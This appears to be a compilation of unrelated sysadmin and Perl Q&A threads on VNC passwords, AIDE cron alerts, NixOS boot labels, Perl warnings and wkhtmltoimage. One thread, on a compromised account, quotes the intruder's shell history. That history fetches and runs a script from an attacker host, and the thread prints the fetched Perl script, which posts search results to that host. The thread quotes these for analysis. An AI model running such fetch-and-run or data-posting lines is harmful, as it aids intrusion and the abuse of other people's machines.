Hi, I need to generate a VNC password using any script (PHP preferably, but any Perl will do).
The problem is that 'vncpasswd' needs interactive user action (prompting for the password and password verification).
Is there a way to generate it without prompting?
From here.
#!/bin/perl
use Crypt::CBC;
my $key = pack("C8", 23, 82, 107, 6, 35, 78, 88, 7);
$cipher = Crypt::CBC->new({
'key'=>$key, 'cipher'=>'DES', 'prepend_iv'=>0, 'regenerate_key'=>0
});
$ciphertext = $cipher->encrypt("This data is hush hush");
$plaintext = $cipher->decrypt($ciphertext);
print "Encrypted: $ciphertext\n";
print "Decrypted: $plaintext\n";
Yes, it's possible; the folder /.vnc must exist and file rights usually have to be set.
So just do this:
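# Create the directory if it does not exist yet
mkdir -p "$HOME/.vnc"
# -f reads the password from stdin and writes the obfuscated form to stdout
vncpasswd -f > "$HOME/.vnc/passwd" <<EOF
123456
123456
EOF
# The password file must be readable by its owner only
chmod 600 "$HOME/.vnc/passwd"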
I set up a crontab. I've installed AIDE and I have an AIDE database to check for file integrity.
How do I get cron to email me ONLY when files have been modified?
The script:
#!/bin/bash
if aide -c /etc/aide/aide.conf --check
then echo "AIDE detected no changes"
else
echo "Alert!: AIDE detected changes!"
fi
The crontab:
* */12 * * * /root/script.sh | mail root@localhost.com
Use the MAILTO crontab variable rather than piping to mail. Then change your script so that it doesn't output anything unless there is a problem:
#!/bin/bash
aide -c /etc/aide/aide.conf --check || echo "Alert!: AIDE detected changes!"
The crontab:
MAILTO=root@localhost.com
* */12 * * * /root/script.sh
MAILTO=""
Notes:
You can use a simple (local) username instead; e.g. root.
You need to have set up mail handling on your system; e.g. delivery to local mailboxes or relaying via an external SMTP service provider such as Gmail. That is beyond the scope of this Q&A.
The MAILTO="" is to stop following cron rules from sending mails. If you want them to do that, leave it out. It must be MAILTO="" not MAILTO=. (Cron is not implementing shell syntax here. Another clue is that you can put spaces around the = which you can't do with shell syntax.)
Setting of variables in crontab is not part of the POSIX spec. There have been many implementations of cron over the years and not all of them support variable setting. Check what man 5 crontab says on your system.
Alternatively, you could use ... | mailx -E root@localhost.com rather than ... | mail root@localhost.com. This will skip sending the mail if the body (i.e. stdin) is empty.
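A cron wrapper in the spirit of the answer above, added here as an example and not part of any of the posts. It assumes the exit-status convention documented in aide(1) and uses a constructed stand-in command (`fake_aide_changed`) so it runs without AIDE installed; the function names are hypothetical.

```shell
#!/bin/bash
# Added example, not from the posts above. Assumes the aide(1) exit-status
# convention: with --check, 0 = no differences, 1-7 = bitmask
# (1 added, 2 removed, 4 changed), anything higher = AIDE itself failed.

# Turn an exit status into a one-line summary; prints nothing for 0.
describe_aide_status() {
    local rc=$1 parts=""
    [ "$rc" -eq 0 ] && return 0
    if [ "$rc" -gt 7 ]; then
        echo "AIDE failed with exit status $rc (see aide(1))"
        return 0
    fi
    [ $(( rc & 1 )) -ne 0 ] && parts="$parts added"
    [ $(( rc & 2 )) -ne 0 ] && parts="$parts removed"
    [ $(( rc & 4 )) -ne 0 ] && parts="$parts changed"
    echo "AIDE detected entries:$parts"
}

# Run the check command given as arguments. The report is captured and is
# printed only when the status is non-zero, so cron has nothing to mail on a
# clean run even if AIDE prints a "found NO differences" line.
run_aide_check() {
    local report rc=0
    report=$("$@" 2>&1) || rc=$?
    if [ "$rc" -eq 0 ]; then
        return 0
    fi
    describe_aide_status "$rc"
    printf '%s\n' "$report"
    return "$rc"
}

# Constructed stand-in for `aide --check` so the example runs without AIDE.
fake_aide_changed() {
    echo "Changed entries: 1"
    return 4
}

# In /root/script.sh the call would be:
#   run_aide_check aide -c /etc/aide/aide.conf --check
run_aide_check fake_aide_changed || true
```

Separating the failure statuses from the change bitmask keeps a broken configuration or unreadable database from being reported as a file modification.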
How do I get cron to email me ONLY when files have been modified?
If you are on Linux with a local file system (e.g. ext4(5) or BTRFS), consider using inotify(7) facilities and then install incrond (on Debian or Ubuntu: the incron package) and use incrontab(5).
Be aware that incron and inotify don't work on remote file systems such as NFS or SMB/CIFS or on pseudofile systems like proc(5).
If you cannot use incron you'll need to use find(1) and perhaps stat(1) in your shell script periodically called by cron.
BTW, some files (e.g. those under /var/run/, see hier(7) for more) are very often modified. And so are the data files handled by RDBMS such as PostgreSQL.
Regarding AIDE, be sure to read its documentation. Since it is open source and even free software, consider studying then improving its code (e.g. to use inotify).
We wrote a Perl script that sends out an email if something went wrong and updates the database so that this email won't go out again.
#!/usr/bin/perl
my $aide = "/usr/sbin/aide -c /etc/aide.conf";
my $email = "security\@your-domain.com";
my $timestamp = `/bin/date +\%Y-\%m-\%d.\%H-\%M`;
my $output = "";
my $added = -1;
my $removed = -1;
my $changed = -1;
my $warning = 0;
my $found_no_differences = 0;
open(AIDE, "$aide --check|");
while (my $line=<AIDE>) {
chomp($line);
$output = $output.$line."\n";
if ($line =~ /Added entries\:\s*(\w+)/) { $added = $1; }
if ($line =~ /Removed entries\:\s*(\w+)/) { $removed = $1; }
if ($line =~ /Changed entries\:\s*(\w+)/) { $changed = $1; }
if ($line =~ /WARNING\:/) { $warning = $warning + 1; }
if ($line =~ /AIDE found NO differences/) { $found_no_differences = 1; }
}
close(AIDE);
if ($found_no_differences > 0) { exit(0); }
if ($added > 0 || $removed > 0 || $changed > 0 || $warning > 0 || $added == -1 || $changed == -1) {
open MAIL, "|mail -s 'AIDE $timestamp' $email";
print MAIL $output;
close MAIL;
system("$aide --init");
system("mv /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz");
}
By default aide sends email to the local root user. It's probably best to create an alias for the local root user to noc@domain.com or whatever you use for your incoming email address; this way you not only get aide emails but also other system mail that's destined for the user root.
There was an account named "user" that would be used for these logins, which would be from all over the world. I spent several hours yesterday securing the computer and there have been no logins since that time. I awked the /var/log/auth.log into a list of ips ordered from oldest to most recent login, if that somehow helps:
One of the first things I did after changing the password of the "user" account was running history, which gave me this result:
1 sudo
2 sudo
3 sudo service vsftpd stop
4 su clay
5 unset PROMPT_COMMAND
6 PS1='[PEXPECT]\$'
7 wget http://xpl.silverlords.org/bing -O bing
8 wget http://www.silverlords.org/wordlist/xaaaaaaaaqb.txt -O word ; perl bing word
9 wget http://www.silverlords.org/wordlist/xaaaaaaaaiv.txt -O word ; perl bing word
10 uname
11 n
12 uname
13 history
I then ran cat /home/user/.bash_history for more but what I already had was all that was in the file.
In "user"'s home folder, I found four files, bing, output.13.19.27.txt, output.16.10.38.txt, and word. All were empty except bing, which was a perl script:
#!/usr/bin/perl
use strict;
use LWP::UserAgent;
use LWP::Simple;
use POSIX qw(strftime);
my $data = strftime "%H.%M.%S", gmtime;
my $ARGC = @ARGV;
if ($ARGC !=1) {
printf "$0 arquivo.txt\n";
printf "Coded by: Al3xG0 x#~\n";
exit(1);
}
my $st = rand();
my $filename = $ARGV[0];
print "Input Filename - $filename\n";
my $max_results = 2;
open (IFH, "< $filename") or die $!;
open (OFH, "> output.${data}.txt") or die $!;
while (<IFH>) {
next if /^ *$/;
my $search_word = $_;
$search_word =~ s/\n//;
print "Results for -$search_word-\n";
for (my $i = 0; $i < $max_results; $i += 10) {
my $b = LWP::UserAgent->new(agent => 'Mozilla/4.8 [en] (Windows NT 6.0; U)');
$b->timeout(30); $b->env_proxy;
my $c = $b->get('http://www.bing.com/search?q=' . $search_word . '&first=' . $i . '&FORM=PERE')->content;
my $check = index($c, 'sb_pagN');
if ($check == -1) { last; }
while (1) {
my $n = index($c, '<h2><a href="');
if ($n == -1) { last; }
$c = substr($c, $n + 13);
my $s = substr($c, 0, index($c, '"'));
my $save = undef;
if ($s =~ /http:\/\/([^\/]+)\//g) { $save = $s; }
print "$save\n";
#if ($save !~ /^ *$/) { print OFH "$save\n"; print "$save\n"};
getprint("http://post.silverlords.org/sites.php?site=$save");
}
}
print "\n";
}
close (IFH);
close (OFH);
I don't know perl, and after spending so much time with sshd config, blacklists, etc., I don't really have the time or energy to learn. If anyone could tell me what the script does and/or what the attackers were trying to do that would be great.
Thanks so much,
Clay
EDIT: I found this article that could explain the purpose of the bing search script: https://www.wired.com/2013/02/microsoft-bing-fights-botnets/
It reads the file passed on the command line, and uses each line as a phrase to do a Bing search. It prints the URL of every search result returned by Bing, and also sends it to http://post.silverlords.org/sites.php?site=$save where $save is the URL.
It used to write the same URLs to the output.HH.MM.SS.txt files, but that line has been commented out so the files are created but left empty.
So it's just a command-line Bing search; nothing too sinister. Essentially nothing that they couldn't run on any machine that has access to Bing.
This is not an answer but merely an overlong comment about the observations I made.
When I issue the wget ... -O word commands, it works for me and I receive two files full of words. Looks like a list of random words, maybe passwords for a brute-force attack:
first file: (excerpt)
kalcio
kalciolaria
kalciolariaconia2
kalciov
kalcistn
kalcit
kalcit
kalcita
...
second file: (excerpt)
curious2s
curious2saab95
curious2:saab95
curious2see
curious2see
curious2squeak2
curious2swingineverton
Curious2tender
curious2tryany2asdfg
CURIOUS2TRYIT
curious2trythre092703
...
The Perl script bing is written by someone who's not familiar with Perl. He uses beginner's style from bad tutorials and/or obviously doesn't know the language very well.
Because he issued su clay he might know that such a user (presumably your user) even exists on that machine, without examining /etc/passwd or similar.
As @borodin and @melpomene say, the script searches bing for these words and then parses the resulting bing-page for URLs and then submits them to post.silverlords.org.
As the script currently is, it only abuses your computer's CPU and network to get its work done. The "work" is to massively submit Bing searches for all the words and collect the results at post.silverlords.org.
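For the triage step the question describes (pulling the login sources for the "user" account out of /var/log/auth.log), a summary per source address is usually more useful than a bare list. This is an added example, not code from the thread; it assumes OpenSSH's standard "Accepted ..." syslog line, and the log lines and the function name `accepted_logins` are constructed for illustration.

```shell
#!/bin/bash
# Added example, not from the posts above. Assumes OpenSSH's syslog line
# "Accepted <method> for <user> from <ip> port <n> ssh2" in /var/log/auth.log.

# Print "ip count methods first-seen" per source address, oldest first.
accepted_logins() {   # usage: accepted_logins <account> < auth.log
    awk -v acct="$1" '
        /sshd\[[0-9]+\]: Accepted / {
            for (i = 1; i <= NF; i++) if ($i == "Accepted") break
            method = $(i + 1); user = $(i + 3); ip = $(i + 5)
            if (user != acct) next
            if (!(ip in count)) { order[++n] = ip; first[ip] = $1 " " $2 " " $3 }
            count[ip]++
            if (index("," methods[ip] ",", "," method ",") == 0) {
                methods[ip] = (methods[ip] == "" ? method : methods[ip] "," method)
            }
        }
        END {
            for (k = 1; k <= n; k++) {
                ip = order[k]
                print ip, count[ip], methods[ip], first[ip]
            }
        }'
}

# Constructed sample log (documentation-range addresses, not real data).
sample_auth_log() {
    cat <<'EOF'
Mar  3 04:12:01 host sshd[1201]: Failed password for user from 203.0.113.7 port 40112 ssh2
Mar  3 04:12:09 host sshd[1201]: Accepted password for user from 203.0.113.7 port 40112 ssh2
Mar  3 09:30:44 host sshd[1388]: Accepted publickey for clay from 192.0.2.10 port 51000 ssh2: RSA SHA256:constructed
Mar  4 01:02:03 host sshd[1502]: Accepted password for user from 198.51.100.23 port 33810 ssh2
Mar  4 01:05:59 host sshd[1519]: Accepted password for user from 203.0.113.7 port 40990 ssh2
EOF
}

sample_auth_log | accepted_logins user
```

On a real system the call is `accepted_logins user < /var/log/auth.log`; rotated logs have to be included separately.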
When I boot my machine it shows all generations in a list, but naming them "Generation 49", "Generation 50", etc.
Is there a way to add labels to generations, so that I can easily see later what was changed? I'd like to have something like an optional commit message, so it could be like "Generation 49 - switched to KDE5", "Generation 50 - switched back to gnome3".
/boot/grub/grub.conf is currently built from:
nixos/modules/system/boot/loader/grub/install-grub.pl
# Emit submenus for all system profiles.
sub addProfile {
my ($profile, $description) = @_;
# Add entries for all generations of this profile.
$conf .= "submenu \"$description\" {\n" if $grubVersion == 2;
sub nrFromGen { my ($x) = @_; $x =~ /\/\w+-(\d+)-link/; return $1; }
my @links = sort
{ nrFromGen($b) <=> nrFromGen($a) }
(glob "$profile-*-link");
my $curEntry = 0;
foreach my $link (@links) {
last if $curEntry++ >= $configurationLimit;
my $date = strftime("%F", localtime(lstat($link)->mtime));
my $version =
-e "$link/nixos-version"
? readFile("$link/nixos-version")
: basename((glob(dirname(Cwd::abs_path("$link/kernel")) . "/lib/modules/*"))[0]);
addEntry("NixOS - Configuration " . nrFromGen($link) . " ($date - $version)", $link);
}
$conf .= "}\n" if $grubVersion == 2;
}
this is a single entry in grub.conf:
menuentry "NixOS - Configuration 38 (2016-01-29 - 16.03pre75806.77f8f35)" {
search --set=drive1 --fs-uuid d931bd85-8f35-4ae9-a36b-c1ac51ad7b57
linux ($drive1)//kernels/56fkcbxnwzi0kh6vg677a4cd4zcabm55-linux-4.1.15-bzImage systemConfig=/nix/store/2sybsl278s5a8kzhplwcz5jbhbsqwdci-nixos-system-lenovo-t530-16.03pre75806.77f8f35 init=/nix/store/2sybsl278s5a8kzhplwcz5jbhbsqwdci-nixos-system-lenovo-t530-16.03pre75806.77f8f35/init loglevel=4
initrd ($drive1)//kernels/r33fajk0kaxlfmg922c2hy4rak5cj90z-initrd-initrd
}
however, nixos-rebuild supports --profile-name, quoting the manpage:
--profile-name, -p
Instead of using the Nix profile /nix/var/nix/profiles/system to keep track of
the current and previous system configurations, use
/nix/var/nix/profiles/system-profiles/name. When you use GRUB 2, for every
system profile created with this flag, NixOS will create a submenu named “NixOS
- Profile 'name'” in GRUB’s boot menu, containing the current and previous
configurations of this profile.
For instance, if you want to test a configuration file named test.nix without
affecting the default system profile, you would do:
$ nixos-rebuild switch -p test -I nixos-config=./test.nix
The new configuration will appear in the GRUB 2 submenu “NixOS - Profile
'test'”.
summary: hope this is what you are looking for.
NIXOS_LABEL="changed-some-settings" nixos-rebuild switch
system.nixos.label
You can set it either in your config, or in the environment (using NIXOS_LABEL).
I have a perl script that works fine when I run it using perl filename, however when I use the command
perl -w logint > logintime.html
I get this error
Use of uninitialized value $days in multiplication (*) at logint line 5, <LAST> line 3.
It repeats this from line 3-47
This is the perl code
#!/usr/bin/perl
open LAST, "last |";
while (<LAST>) {
if (($name,$days,$hours,$mins) = /^(\w+).+\((?:(\d+)\+)?(\d+):(\d+)/) {
$TIMES{$name} += 1440 * $days + 60 * $hours + $mins;
}
}
foreach (sort keys %TIMES) {
print "$_ $TIMES{$_}\n";
}
This is how I'm attempting to output it.
#!/bin/bash
echo $HDR > ~/public_html/logintime.html
perl -w logint > logintime.html
echo $FTR >> ~/public_html/logintime.html
This is just a warning, it's not an error. You're seeing it when you run that command because '-w' is the warnings pragma.
You could also put it at the end of your shebang
#!/usr/bin/perl -w
Or 'use warnings;'. Anyway, the warning is just saying it doesn't have a value. It looks like you're reading the last log to see who last logged in, the output can be different depending on what OS you're on. I would confirm it's working as expected and getting the correct values.
It's also best practice to use 'use strict;'.
I am trying to use wkhtmltoimage to convert html and web pages to images using Perl module WKHTMLTOPDF. The script and code below works from the command line but does not work if I call the script from browser.
Update:
If I run the script from the shell as a root user, it runs without
error, if I switch to the domain user where the script is located,
I get that error, seems it is executable permissions for domain owner.
The error is:
error running '/usr/local/bin/wkhtmltoimage': '/usr/local/bin/wkhtmltoimage http://yahoo.com
/home/xxxx/public_html/pdfwebkit/output.png' died with signal 11, with coredump at
/usr/local/perl-5.18.1/lib/site_perl/5.18.1/MooseX/Role/Cmd.pm line 128.
MooseX::Role::Cmd::run(WKHTMLTOPDF=HASH(0x2714260), "http://yahoo.com",
"/home/xxxx/public_html/pdfwebkit/output.png") called at /usr/local/
perl-5.18.1/lib/site_perl/5.18.1/WKHTMLTOPDF.pm line 645 WKHTMLTOPDF::generate(WKHTMLT
OPDF=HASH(0x2714260)) called at htmltoimage.cgi line xxx main::convert_using_WKHTMLTOPDF_image("http://yahoo.com",
"/home/xxxx/public_html/pdfwebkit/output.png") called at htmltoimage.cgi line xx
The code I am using is:
#!/usr/bin/perl
#!C:\perl\bin\perl.exe
print "Content-type: text/html;charset=utf-8\n\n";
use File::Spec::Functions;
use File::Basename;
BEGIN {
$|=1;
use CGI::Carp qw(fatalsToBrowser set_message);
sub handle_errors {
#print "Content-type: text/html;charset=utf-8\n\n";
my $msg = shift;
print qq!<h1><font color="red">Software Error</font></h1>!;
print qq!<p>$msg</p>!;
}
set_message(\&handle_errors);
}
$|=1;
my ($Script, $Bin);
if ($ENV{SCRIPT_FILENAME}) {
($Script, $Bin) = fileparse($ENV{SCRIPT_FILENAME});
}
else {
($Script, $Bin) = fileparse(__FILE__);
}
use WKHTMLTOPDF;
my $outfile = catfile ($Bin, 'output.jpg');
print "Converting url to image file $outfile...<br>\n";
convert_using_WKHTMLTOPDF_image('http://yahoo.com', $outfile);
print "Finished...<br>\n";
exit;
sub convert_using_WKHTMLTOPDF_image {
my ($page, $output) = @_;
my $pdf = new WKHTMLTOPDF;
my $bin = '/usr/local/bin/wkhtmltoimage';
#my $bin = 'C:/Program Files/wkhtmltopdf/bin/wkhtmltoimage.exe';
$pdf->bin_name($bin);
$pdf->_input_file($page);
$pdf->_output_file($output);
#$pdf->grayscale(1);
$pdf->generate;
}
sub convert_html_to_image_direct {
my ($page, $output) = @_;
my $bin = '/usr/local/bin/wkhtmltoimage --quiet ';
my $out = `$bin $page $output`;
print "out: $out<br>\n";
return $out;
}
The code works on Windows from the browser normally.
I am having the same issue if I try to use wkhtmltopdf for converting html to pdf.
The way I installed the binaries is from here:
https://gist.github.com/DaRamirezSoto/5489861
# wget http://wkhtmltopdf.googlecode.com/files/wkhtmltoimage-0.11.0_rc1-static-amd64.tar.bz2
# wget http://wkhtmltopdf.googlecode.com/files/wkhtmltopdf-0.11.0_rc1-static-amd64.tar.bz2
# tar xvjf wkhtmltoimage-0.11.0_rc1-static-amd64.tar.bz2
# tar xvjf wkhtmltopdf-0.11.0_rc1-static-amd64.tar.bz2
# chown root:root wkhtmltopdf-amd64
# chown root:root wkhtmltoimage-amd64
# mv wkhtmltopdf-amd64 /usr/bin/wkhtmltopdf
# mv wkhtmltoimage-amd64 /usr/bin/wkhtmltoimage
// dependencies
# yum install -y libXrender libXext openssl openssl-devel fontconfig
I tested (in IE 11/Win 8.1) using Centos 6 server, worked fine with a little change to the path to the folder where I wanted it to be saved in.
My output was
Converting url to image file /home/user/../bittertruth.jpg...
Finished...
which is just as expected by you....